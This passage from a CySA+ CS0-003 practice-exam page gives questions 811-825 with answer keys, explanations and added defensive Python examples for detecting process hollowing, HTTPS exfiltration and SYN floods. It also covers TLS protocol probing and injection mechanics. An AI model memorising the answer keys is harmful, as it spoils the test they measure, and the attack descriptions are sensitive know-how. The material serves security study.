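    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, desc_rva, 40)                # data directory[1] = imports
    sec = b".idata\0\0" + struct.pack("<IIIIIIHHI", len(body), sec_va, len(body), sec_raw,
                                      0, 0, 0, 0, 0xC0000040)
    return bytes((dos + b"PE\0\0" + coff + bytes(opt) + sec).ljust(sec_raw, b"\0") + body)


if __name__ == "__main__":
    imports = list_imports(build_sample_pe())
    print(imports, injection_indicators(imports))
```

On a real sample, read the file bytes in place of build_sample_pe(); a near-empty result with only LoadLibrary/GetProcAddress is the packing or runtime-resolution case discussed above.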

811
MCQhard

During an incident, the SOC team identifies indicators of compromise (IoCs) that may affect partners. According to best practices, what should the analyst do first?

A.Follow the incident response communication plan
B.Wait until the incident is fully resolved
C.Post the IoCs on a public threat sharing platform
D.Directly notify all affected partners
AnswerA

The plan outlines steps for internal and external communication.

Why this answer

An incident response plan should define communication procedures; typically, the team should escalate internally to leadership who can authorize external notifications.

812
MCQeasy

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

A.Network-based scan without credentials
B.Non-credentialed external scan
C.Credentialed internal scan
D.Agent-based scan
AnswerC

Credentialed scans have access to system patch information.

Why this answer

Credentialed scans authenticate to the target OS and query the package manager or patch database directly, yielding far more accurate results than uncredentialed scans, which infer patch level from banners and observable behaviour. Agent-based scans (option D) also read patch state locally and are equally accurate where the agent is deployed; on the exam, 'credentialed scan' is the term used for authenticated patch assessment of internal servers.

813
MCQhard

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

A.Reflective DLL injection
B.API hooking
C.Process hollowing
D.DLL injection
AnswerC

Process hollowing creates a process in a suspended state and replaces its memory with malicious code, matching the finding of code without a file backing.

Why this answer

Hollowing starts a legitimate process suspended, unmaps or overwrites its image, writes the malicious payload into the same process and resumes it; the result is a process whose main image region is no longer backed by the executable on disk. Note that an executable region without file backing is also what reflective DLL injection produces, so in a memory dump confirm hollowing by checking the region at the process's image base (from the PEB): if that region is private, or its backing file does not match the path the PEB reports, the process was hollowed; an extra unbacked executable region elsewhere, with the real image still intact at its base, points to reflective injection instead.
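Added example, not from the original page: the triage logic above run over a constructed per-process view (image base and path from the PEB, regions from the VAD tree) in the shape a memory-forensics tool reports them; process names, addresses and protections are invented for the demo.

```python
# Constructed per-process view as a memory-forensics tool would present it:
# image_base/image_path from the PEB, regions from the VAD tree. Illustrative only.
PROCESSES = {
    1234: {"name": "svchost.exe", "image_base": 0x00400000,
           "image_path": r"C:\Windows\System32\svchost.exe",
           "regions": [
               # main image is private memory: the hollowing signature
               {"start": 0x00400000, "protect": "PAGE_EXECUTE_READWRITE", "file": None, "head": b"MZ\x90\x00"},
               {"start": 0x77000000, "protect": "PAGE_EXECUTE_READ",
                "file": r"C:\Windows\System32\ntdll.dll", "head": b"MZ\x90\x00"},
           ]},
    2000: {"name": "explorer.exe", "image_base": 0x7FF600000000,
           "image_path": r"C:\Windows\explorer.exe",
           "regions": [
               {"start": 0x7FF600000000, "protect": "PAGE_EXECUTE_WRITECOPY",
                "file": r"C:\Windows\explorer.exe", "head": b"MZ\x90\x00"},
               # real image intact, extra unbacked executable PE elsewhere: reflective injection
               {"start": 0x1A2B0000, "protect": "PAGE_EXECUTE_READWRITE", "file": None, "head": b"MZ\x90\x00"},
               {"start": 0x1A2C0000, "protect": "PAGE_READWRITE", "file": None, "head": b"\x00\x00\x00\x00"},
           ]},
    3000: {"name": "notepad.exe", "image_base": 0x7FF700000000,
           "image_path": r"C:\Windows\System32\notepad.exe",
           "regions": [
               {"start": 0x7FF700000000, "protect": "PAGE_EXECUTE_WRITECOPY",
                "file": r"C:\Windows\System32\notepad.exe", "head": b"MZ\x90\x00"},
           ]},
}


def triage(processes):
    """Return {pid: [verdicts]} distinguishing hollowing from other unbacked code."""
    verdicts = {}
    for pid, p in processes.items():
        hits = []
        for r in p["regions"]:
            executable = "EXECUTE" in r["protect"]
            unbacked = r["file"] is None
            if r["start"] == p["image_base"]:
                # The main image must be backed by the file the PEB names; a private
                # or mismatched mapping at ImageBase means the image was replaced.
                if unbacked or r["file"].lower() != p["image_path"].lower():
                    hits.append("process_hollowing")
            elif executable and unbacked:
                hits.append("reflective_injection" if r["head"].startswith(b"MZ")
                            else "unbacked_executable_memory")
        if hits:
            verdicts[pid] = hits
    return verdicts


if __name__ == "__main__":
    for pid, hits in triage(PROCESSES).items():
        print(pid, PROCESSES[pid]["name"], hits)
```

The third label covers position-independent shellcode, which has no MZ header; it is still unbacked executable memory and still worth dumping, but it is not evidence for either of the two named techniques.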

814
Multi-Selecthard

A threat hunter suspects data exfiltration over HTTPS from a database server. Which data sources are most useful? (Choose two.)

Select 2 answers
A.Database audit logs showing queried objects and accounts
B.Printer toner status
C.Building temperature logs
D.NetFlow or proxy logs showing destination, volume, and timing
AnswersA, D

Database logs reveal whether sensitive data was accessed before transfer.

Why this answer

Database audit logs record which objects (tables, columns) were queried and by which accounts, directly revealing unauthorized access or unusual data retrieval patterns that could indicate exfiltration. NetFlow or proxy logs capture destination IP addresses, data volumes, and timing of HTTPS sessions, allowing the hunter to spot large or anomalous outbound transfers to suspicious hosts, even though the payload is encrypted.

Exam trap

The CS0-003 exam often tests the misconception that encrypted traffic (HTTPS) is completely opaque, leading candidates to overlook metadata sources like NetFlow or proxy logs that can reveal exfiltration patterns without decryption.
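Added example serving both this question and the exfiltration indicators discussed earlier on this page (unusual volume, off-hours timing, non-standard HTTPS port): scoring constructed proxy/NetFlow-style records against each host's own baseline. Business hours, the 10x multiplier, the record layout and the addresses are assumptions for the demo; no payload is inspected, only metadata.

```python
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

BUSINESS_HOURS = range(8, 18)   # 08:00-17:59 local; assumption for the demo
VOLUME_MULTIPLIER = 10          # flag a flow larger than 10x the host's median; assumption
STANDARD_TLS_PORTS = {443}

# Constructed proxy/NetFlow-style records: (src, dst, dst_port, app, bytes_out, local time)
FLOWS = [
    ("10.0.5.20", "203.0.113.10", 443, "https", 1_200_000, "2024-03-04 10:15:00"),
    ("10.0.5.20", "203.0.113.10", 443, "https",   900_000, "2024-03-04 11:40:00"),
    ("10.0.5.20", "203.0.113.10", 443, "https", 1_100_000, "2024-03-05 09:05:00"),
    ("10.0.5.20", "203.0.113.10", 443, "https", 1_000_000, "2024-03-05 14:30:00"),
    ("10.0.5.20", "198.51.100.7", 8080, "https", 9_800_000_000, "2024-03-06 02:10:00"),
    ("10.0.5.21", "203.0.113.10", 443, "https",   700_000, "2024-03-06 10:00:00"),
    ("10.0.5.21", "203.0.113.10", 443, "https",   800_000, "2024-03-06 15:00:00"),
]


def _parse(rec):
    src, dst, port, app, nbytes, ts = rec
    return {"src": src, "dst": dst, "port": port, "app": app, "bytes": nbytes,
            "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")}


def score_flows(records):
    """Return [(src, dst, port, [indicators])] for flows that trip any indicator."""
    flows = [_parse(r) for r in records]
    by_src = defaultdict(list)
    for f in flows:
        by_src[f["src"]].append(f)
    results = []
    for src, group in by_src.items():
        # median rather than mean: a single huge flow would drag the mean up and
        # hide itself inside a mean-plus-sigma band
        baseline = median(f["bytes"] for f in group)
        dst_seen = Counter(f["dst"] for f in group)
        for f in group:
            hits = []
            if f["bytes"] > VOLUME_MULTIPLIER * baseline:
                hits.append("volume")
            if f["ts"].hour not in BUSINESS_HOURS or f["ts"].weekday() >= 5:
                hits.append("off_hours")
            if f["app"] == "https" and f["port"] not in STANDARD_TLS_PORTS:
                hits.append("nonstandard_port")
            if dst_seen[f["dst"]] == 1:       # first and only contact with this destination
                hits.append("new_destination")
            if hits:
                results.append((f["src"], f["dst"], f["port"], hits))
    return results


if __name__ == "__main__":
    for src, dst, port, hits in score_flows(FLOWS):
        print(f"{src} -> {dst}:{port}  {', '.join(hits)}")
```

The "new_destination" indicator needs a baseline window long enough to contain the host's routine destinations, otherwise every flow on a freshly monitored host is "new"; the database audit log from this question then answers the second question the flow data cannot, which accounts and tables were read just before the transfer.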

815
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For business prioritization, which recommendation gives the best risk-based order of work?

A.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
B.Delete the server from the scan scope
C.Change the severity to informational automatically
D.Close the finding because the owner disagrees
AnswerA

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option A is correct because the best validation method is to independently verify the server's TLS configuration by manually testing with a TLS client or a scanner profile that explicitly attempts to negotiate TLS 1.0, for example 'openssl s_client -tls1 -connect host:443'. A completed handshake reporting 'Protocol : TLSv1' confirms the finding; a handshake alert from the server refutes it. One caveat: if the client prints 'no protocols available', the local OpenSSL refused to offer TLS 1.0 at all (recent OpenSSL 3 builds do this at their default security level), which says nothing about the server; retry with -cipher 'DEFAULT:@SECLEVEL=0' or use another tool such as nmap's ssl-enum-ciphers script. Direct negotiation eliminates false positives from scanners that rely on banners or stale fingerprints, and confirms whether the service accepts TLS 1.0 at the protocol level.

Exam trap

The trap here is that candidates assume the scanner's automated result is always accurate and choose to change severity or remove the finding, rather than understanding that validation through independent protocol negotiation is the required step before any risk-based prioritization.

How to eliminate wrong answers

Option B is wrong because deleting the server from the scan scope ignores the potential vulnerability entirely, failing to validate the finding and leaving the organization exposed if TLS 1.0 is actually enabled. Option C is wrong because automatically changing the severity to informational without validation could mask a real risk; severity should be based on verified technical evidence, not automated assumptions, and this bypasses proper risk assessment. Option D is wrong because the owner's statement is a claim, not evidence; findings are closed on tested results, and if the owner is right the test will show it.

816
MCQeasy

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

A.Mark the finding as a false positive and close it.
B.Immediately patch the server to remove the vulnerability.
C.Document the compensating control and track the finding until patched.
D.Increase the scan frequency to detect if the vulnerability changes.
AnswerC

Correct. The vulnerability is real but mitigated; it should be tracked with the compensating control noted.

Why this answer

The vulnerability is real but currently mitigated by a compensating control (the WAF), so the finding stays open with the control documented and a target date for the patch. Before relying on the WAF, confirm that it actually blocks the exploit pattern for this specific vulnerability (for example by replaying the scanner's test request through the WAF and checking that it is dropped) and that no path reaches the server around the WAF, such as a direct internal route or a second listener; record a re-validation date, because a WAF rule change silently removes the mitigation.

817
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For control selection, which control best addresses the stated weakness without hiding risk?

A.Close the finding because the owner disagrees
B.Change the severity to informational automatically
C.Delete the server from the scan scope
D.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
AnswerD

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option D is correct because the best validation method is to manually test the service using a TLS client (e.g., 'openssl s_client -tls1 -connect host:443') or a scanner profile that explicitly attempts to negotiate TLS 1.0. This directly verifies whether the server truly rejects TLS 1.0 handshakes, eliminating false positives from scanner misconfiguration or version negotiation quirks; make sure the failure observed comes from the server and not from a client that no longer offers TLS 1.0 itself. Relying on the owner's assertion or altering the finding without technical proof would violate vulnerability management best practices.

Exam trap

CompTIA often tests the misconception that a service owner's claim or a scanner's default severity should override manual technical verification, tempting candidates to choose administrative actions (A, B, C) instead of the rigorous validation step (D).

How to eliminate wrong answers

Option A is wrong because closing a finding solely because the owner disagrees ignores the need for technical validation and hides potential risk. Option B is wrong because automatically changing severity to informational without testing conceals the actual risk level and violates the principle of risk transparency. Option C is wrong because deleting the server from scan scope removes visibility entirely, which is an extreme and inappropriate response that does not address the underlying protocol weakness.

818
Multi-Selectmedium

A Security Operations Center (SOC) analyst is tuning a SIEM rule to reduce false positives. Which three of the following are valid approaches to improve the signal-to-noise ratio of a detection rule? (Choose three.)

Select 3 answers
A.Adding a whitelist for known benign source IP addresses or user accounts.
B.Increasing the severity level of the alert to ensure faster response.
C.Adjusting the time window for event correlation to reduce overlapping alerts.
D.Removing the rule entirely to eliminate all associated noise.
E.Refining the event frequency threshold to require a higher number of occurrences.
F.Adding additional event sources to broaden the scope of detection.
AnswersA, C, E

Allowlisting known-benign sources, tightening the correlation window, and raising the occurrence threshold all cut false positives while keeping the detection logic intact.

Why this answer

Adding an allowlist (A) for known benign source IP addresses or user accounts removes traffic that is known to be safe (vulnerability scanners, monitoring probes, service accounts) from the rule's input, so only genuinely suspicious activity alerts, without altering the detection logic itself. Adjusting the correlation time window (C) controls how far apart related events can be and still count as one incident, which collapses overlapping alerts into a single one. Raising the frequency threshold (E) requires a pattern to repeat before it alerts, filtering out one-off events such as a single mistyped password. Each allowlist entry should carry an owner and a review date, because an allowlist is also the easiest place for an attacker's traffic to hide once they learn which sources are exempt.

Exam trap

CompTIA often tests the misconception that increasing severity or adding more data sources improves detection quality, when in fact these actions can degrade the signal-to-noise ratio by amplifying noise or misdirecting analyst attention.
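Added example, not from the original page: an untuned failed-logon rule beside a tuned one that applies the three approaches above (allowlist, correlation window, occurrence threshold) to constructed events; the IPs, accounts and thresholds are invented for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon events: (UTC time, source IP, account)
EVENTS = [
    *[(f"2024-03-06 03:00:{i:02d}", "10.0.0.50", "svc_scanner") for i in range(0, 50, 10)],  # vuln scanner, 5
    *[(f"2024-03-06 04:00:{i:02d}", "10.0.2.7", "svc_backup") for i in range(0, 30, 10)],   # service account, 3
    *[(f"2024-03-06 09:00:{i:02d}", "203.0.113.9", "admin") for i in range(0, 60, 10)],     # brute force, 6 in 1 min
    ("2024-03-06 09:30:00", "10.0.3.15", "alice"),                                          # one typo
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def raw_rule(events):
    """Untuned rule: one alert per failed logon."""
    return [{"src": src, "user": user, "at": ts} for ts, src, user in events]


def tuned_rule(events, threshold=5, window=timedelta(minutes=5),
               ip_allowlist=frozenset(), user_allowlist=frozenset()):
    """Drop allowlisted sources, then alert only when `threshold` failures from one
    source fall inside `window`. Fires once when the window first fills."""
    alerts = []
    recent = defaultdict(list)
    for ts, src, user in sorted(events, key=lambda e: _ts(e[0])):
        if src in ip_allowlist or user in user_allowlist:
            continue
        t = _ts(ts)
        q = recent[src]
        q.append(t)
        while t - q[0] > window:            # slide the window forward
            q.pop(0)
        if len(q) == threshold:             # == not >=: a sustained burst does not re-alert on every event
            alerts.append({"src": src, "count": len(q), "first": q[0], "last": t})
    return alerts


if __name__ == "__main__":
    print("raw alerts:", len(raw_rule(EVENTS)))
    print("tuned alerts:", tuned_rule(EVENTS, ip_allowlist={"10.0.0.50"},
                                      user_allowlist={"svc_backup"}))
```

Run without the allowlists the tuned rule still fires on the scanner, which is the point of option A: thresholds alone cannot tell a scanner from an attacker, only knowledge of the environment can.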

819
MCQhard

A team says a critical vulnerability was patched. What should the vulnerability manager require before closure? For validation, which action should be taken before closing or downgrading the finding?

A.Create a duplicate ticket for every asset
B.A retest showing the vulnerable condition is no longer present
C.Close it immediately based on the email
D.Wait one year before testing
AnswerB

Closure should be based on validation evidence, not only a remediation claim.

Why this answer

Option B is correct because the vulnerability manager must obtain objective evidence that the fix was successfully applied and the vulnerability is no longer exploitable. A retest—typically performed via authenticated scanning or manual verification—confirms the absence of the vulnerable condition, aligning with the remediation validation phase in the vulnerability management lifecycle. Closing based solely on a team's email (Option C) violates the principle of verify, not trust, and could leave residual risk unaddressed.

Exam trap

The CS0-003 exam often tests the principle that vulnerability closure requires independent verification (retest) rather than accepting a team's assertion, and the trap here is that candidates may think an email confirmation is sufficient because it comes from the responsible team, ignoring the need for objective evidence.

How to eliminate wrong answers

Option A is wrong because creating a duplicate ticket for every asset introduces unnecessary administrative overhead and does not provide any validation that the patch was applied or effective; it merely duplicates work without confirming remediation. Option C is wrong because closing a finding based solely on an email from the team bypasses the required verification step; the vulnerability manager must independently confirm the fix through a retest or equivalent evidence, as the team's claim could be mistaken or incomplete. Option D is wrong because waiting a year leaves a critical finding unverified for the whole period; validation should follow remediation promptly, within the SLA for that severity.

820
MCQmedium

A vulnerability scanner reports that an internal web application is vulnerable to SQL injection. The development team says they fixed it by input sanitization. Which of the following should the analyst do FIRST?

A.Update the vulnerability report
B.Perform a manual penetration test
C.Rescan the application to confirm remediation
D.Review the code changes
AnswerC

Rescanning provides immediate evidence of whether the vulnerability is resolved.

Why this answer

Option C is correct because the first step after a claimed fix is to verify the remediation by rescanning the application with the same vulnerability scanner. This provides objective evidence that the SQL injection vector is no longer exploitable, confirming the input sanitization was effective before any further actions are taken.

Exam trap

CompTIA often tests the misconception that reviewing code changes is the immediate next step, but the correct first action is always to verify the fix with the same scanning tool to maintain an objective audit trail.

How to eliminate wrong answers

Option A is wrong because updating the vulnerability report without verifying the fix could propagate false information and lead to compliance issues. Option B is wrong because performing a manual penetration test is a valid next step but should come after automated rescanning to confirm the basic fix, as it is more resource-intensive and may miss simple residual issues. Option D is wrong because reviewing code changes is a development task and not the analyst's first action; the analyst should first confirm the fix via scanning to maintain an objective security posture.

821
MCQeasy

A CI pipeline blocks a container image because the base layer contains a critical OpenSSL CVE. The application team says the vulnerable binary is not used. What is the BEST next step? For validation, which action should be taken before closing or downgrading the finding?

A.Ship the image and document nothing
B.Validate exploitability and rebuild from a patched base image where feasible
C.Only rename the image tag
D.Ignore all base-image vulnerabilities
AnswerB

Container findings should consider reachability, but rebuilding from a patched base reduces inherited risk.

Why this answer

Option B is correct because the best next step is to validate whether the vulnerable OpenSSL library is actually reachable in the container's runtime context (it may be a library no process loads, or a dead code path). Validate 'unused' rather than accept it: confirm that no process in the running container loads libssl or libcrypto (for example by comparing the image's SBOM, or 'ldd' output for the entrypoint binary, against the flagged package). If the library is truly unused, the team should still rebuild from a patched base image where feasible to maintain a clean supply chain and avoid false-positive fatigue; if an exception is accepted instead, record it with an owner and an expiry so the pipeline gate stays meaningful. If the library is used, the vulnerability must be remediated. This balances security rigor with operational pragmatism, aligning with vulnerability management best practices for containerized environments.

Exam trap

CompTIA often tests the misconception that a vulnerability can be safely ignored simply because the application team claims the binary is unused, without requiring validation or a documented risk acceptance process.

How to eliminate wrong answers

Option A is wrong because shipping the image without documentation violates security policy and audit requirements, leaving no record of the risk acceptance decision. Option C is wrong because renaming the image tag does not change the vulnerable base layer; the CVE remains present and exploitable if the binary is used. Option D is wrong because ignoring all base-image vulnerabilities is negligent; even if this specific CVE is not exploitable, other vulnerabilities in the same base layer could be active, and blanket ignoring undermines the CI pipeline's security gates.

822
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A.Credential access or lateral movement activity that warrants high-priority investigation
B.The file share requires more storage capacity
C.A scheduled password rotation completed successfully
D.The SIEM parser is always broken
AnswerA

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

A deception credential is a deliberately planted fake credential (e.g., a honey token) that no legitimate user should ever use. When it is used to authenticate to a server, it indicates that an attacker has discovered the credential and is attempting to use it for lateral movement or credential access. This is a high-fidelity alert that warrants immediate investigation because it directly signals unauthorized activity.

Exam trap

The CS0-003 exam often tests the concept that deception credentials are not used by legitimate users or automated processes, so any authentication with them is malicious; the trap is confusing this with routine administrative actions like password rotation or storage issues.

How to eliminate wrong answers

Option B is wrong because the file share requiring more storage capacity is a capacity management issue, not a security detection concern; it would not generate an authentication event. Option C is wrong because a scheduled password rotation would use legitimate, known credentials and would not involve a deception credential that no legitimate user should know; password rotation tools do not authenticate with honey tokens. Option D is wrong because a broken SIEM parser produces missing or malformed events, not a well-formed authentication event containing a credential that was never issued to anyone; 'always' is also an absolute that nothing in the scenario supports.

823
MCQhard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For stakeholder management, which documentation or approval is required to keep the programme defensible?

A.Remediate alphabetically by CVE ID
B.Remediate only vulnerabilities with vendor logos in the report
C.Prioritize the KEV/high-EPSS issue after confirming asset exposure
D.Always sort only by CVSS base score
AnswerC

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option C is correct because a CISA KEV listing means exploitation has actually been observed in the wild, and a high EPSS score means a high predicted probability of exploitation in the next 30 days; together they make the medium CVSS vulnerability a higher operational priority than high CVSS issues that are not exploitable in this environment. The analyst must first confirm asset exposure (that the vulnerable component is present and reachable) before recommending remediation, and should record that reasoning with the finding so the deviation from CVSS order is defensible to auditors and service owners. This aligns with risk-based vulnerability management (RBVM), which weighs exploitability and threat intelligence alongside the CVSS base score rather than relying on the score alone.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the trap here is that a medium CVSS vulnerability with KEV/high EPSS is more urgent than high CVSS issues that are not exploitable in the environment.

How to eliminate wrong answers

Option A is wrong because sorting alphabetically by CVE ID ignores all risk factors (CVSS, KEV, EPSS, exploitability) and would waste resources on low-priority findings. Option B is wrong because vendor logos in a report do not correlate with exploitability or business risk; a vulnerability may lack a vendor logo yet still be actively exploited and critical to remediate. Option D is wrong because the CVSS base score measures intrinsic severity with no environmental or threat context; sorting only by base score would put the non-exploitable high-scoring issues ahead of the vulnerability that is being exploited right now.
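Added example, not from the original page: a risk-based ordering that gates on confirmed exposure first, then KEV, then EPSS, then CVSS, run over constructed findings (the CVE identifiers are placeholders, not real advisories). The EPSS cut-off and the tier rules are assumptions of the kind a programme would document so the ordering is defensible.

```python
# Constructed findings; CVE identifiers are placeholders, not real advisories.
FINDINGS = [
    {"id": "F-1", "cve": "CVE-0000-0001", "cvss": 9.8, "kev": False, "epss": 0.01, "exposed": False, "asset": "build-agent-07"},
    {"id": "F-2", "cve": "CVE-0000-0002", "cvss": 5.3, "kev": True,  "epss": 0.92, "exposed": True,  "asset": "vpn-gw-01"},
    {"id": "F-3", "cve": "CVE-0000-0003", "cvss": 8.1, "kev": False, "epss": 0.45, "exposed": True,  "asset": "web-01"},
    {"id": "F-4", "cve": "CVE-0000-0004", "cvss": 9.1, "kev": False, "epss": 0.02, "exposed": True,  "asset": "web-02"},
    {"id": "F-5", "cve": "CVE-0000-0005", "cvss": 7.5, "kev": True,  "epss": 0.60, "exposed": False, "asset": "lab-db-03"},
]
EPSS_HIGH = 0.30   # assumption: treat a predicted exploitation probability >= 30% as "high"


def priority(f):
    """Return (tier, reason); lower tier is fixed first. 'exposed' is the analyst's
    confirmation that the vulnerable component is present and reachable."""
    if not f["exposed"]:
        if f["kev"]:
            return 3, "KEV but not reachable: patch in normal cycle, document why"
        return 4, "not reachable: track, revisit if exposure changes"
    if f["kev"]:
        return 1, "KEV + exposed: emergency change"
    if f["epss"] >= EPSS_HIGH:
        return 2, "high EPSS + exposed: next maintenance window"
    if f["cvss"] >= 9.0:
        return 3, "critical CVSS + exposed, low predicted likelihood"
    return 4, "exposed, low likelihood: normal cycle"


def prioritize(findings):
    """Order by tier, then EPSS, then CVSS; the reason travels with the finding."""
    ranked = [{**f, "tier": priority(f)[0], "reason": priority(f)[1]} for f in findings]
    return sorted(ranked, key=lambda r: (r["tier"], -r["epss"], -r["cvss"]))


def cvss_only(findings):
    """The ordering the exam trap describes, for comparison."""
    return sorted(findings, key=lambda f: -f["cvss"])


if __name__ == "__main__":
    for r in prioritize(FINDINGS):
        print(f'P{r["tier"]} {r["id"]} {r["asset"]:14} cvss={r["cvss"]} epss={r["epss"]:.2f} {r["reason"]}')
```

The "reason" string is the documentation the second half of the question asks for: a finding deprioritized below its CVSS score must carry the exposure evidence and the approver, otherwise the programme cannot show an auditor why a 9.8 sat behind a 5.3.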

824
MCQmedium

During a forensic analysis, an analyst needs to collect data in order of volatility. Which of the following represents the correct order from most volatile to least volatile?

A.Disk, swap, RAM, CPU registers, logs
B.CPU registers, RAM, swap, disk, logs
C.RAM, CPU registers, swap, disk, logs
D.Logs, disk, swap, RAM, CPU registers
AnswerB

This is the correct order of volatility.

Why this answer

The order of volatility dictates that volatile data in memory (CPU registers, RAM) is collected first, then less volatile data like swap, disk, and logs. The correct sequence is CPU registers, RAM, swap, disk, then logs.

825
MCQmedium

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

A.DNS amplification
B.SYN flood
C.ARP spoofing
D.Port scan
AnswerB

Repeated SYNs without final ACK indicate a SYN flood DoS attack.

Why this answer

A half-open TCP handshake (SYN flood) is a common DoS technique: the attacker sends many SYN packets, often from spoofed addresses, and never completes the handshake, so the server's backlog fills with half-open connections and legitimate clients cannot connect. Note that a half-open (SYN) port scan produces the same per-connection pattern; the difference is shape and volume: a flood is many SYNs to one service at a high rate, a scan is one SYN to each of many ports from the same source.
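Added example, not from the original page: half-open connection tracking over a constructed packet summary, distinguishing a SYN flood from a SYN scan by the shape of the half-open connections; the thresholds and addresses are invented for the demo.

```python
from collections import Counter, defaultdict


def build_sample_capture():
    """Constructed packet summaries: (src, sport, dst, dport, tcp_flags)."""
    pkts = []
    victim = "10.0.0.5"
    for i in range(60):                      # flood: 60 spoofed clients, one SYN each, never ACKed
        src, sport = f"192.0.2.{i + 1}", 40000 + i
        pkts += [(src, sport, victim, 443, "S"), (victim, 443, src, sport, "SA")]
    for port in range(20, 40):               # half-open scan: one client, 20 ports (all shown open)
        pkts += [("198.51.100.9", 51000 + port, victim, port, "S"),
                 (victim, port, "198.51.100.9", 51000 + port, "SA")]
    pkts += [("10.0.1.8", 52000, victim, 443, "S"), (victim, 443, "10.0.1.8", 52000, "SA"),
             ("10.0.1.8", 52000, victim, 443, "A")]   # normal completed handshake
    return pkts


def half_open(packets):
    """Connections that saw SYN and SYN-ACK but never the client's ACK,
    keyed as (client, client_port, server, server_port)."""
    seen = defaultdict(set)
    for src, sport, dst, dport, flags in packets:
        if flags == "SA":                    # server reply: re-key by the client side
            key = (dst, dport, src, sport)
        elif flags in ("S", "A"):
            key = (src, sport, dst, dport)
        else:
            continue
        seen[key].add(flags)
    return [k for k, f in seen.items() if f == {"S", "SA"}]


def classify(packets, flood_threshold=50, scan_threshold=10):
    """Many half-open connections to one service = flood; one client with
    half-open connections to many ports = scan."""
    ho = half_open(packets)
    per_service = Counter((srv, sport) for _, _, srv, sport in ho)
    per_client = defaultdict(set)
    for client, _, srv, sport in ho:
        per_client[client].add((srv, sport))
    verdicts = {}
    for (srv, sport), n in per_service.items():
        if n >= flood_threshold:
            verdicts[f"{srv}:{sport}"] = f"syn_flood ({n} half-open)"
    for client, services in per_client.items():
        if len(services) >= scan_threshold:
            verdicts[client] = f"syn_scan ({len(services)} ports)"
    return verdicts


if __name__ == "__main__":
    print(classify(build_sample_capture()))
```

On a real capture the half-open set needs a time bound (a SYN-ACK with no ACK is normal for the few hundred milliseconds of a slow client), and the flood count should be taken per second rather than over the whole file; the data shape is what lets the analyst say "flood" rather than "scan" to the network team.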

CompTIA CySA+ CS0-003 CS0-003 Questions 751–825 | Page 11/14 | Courseiva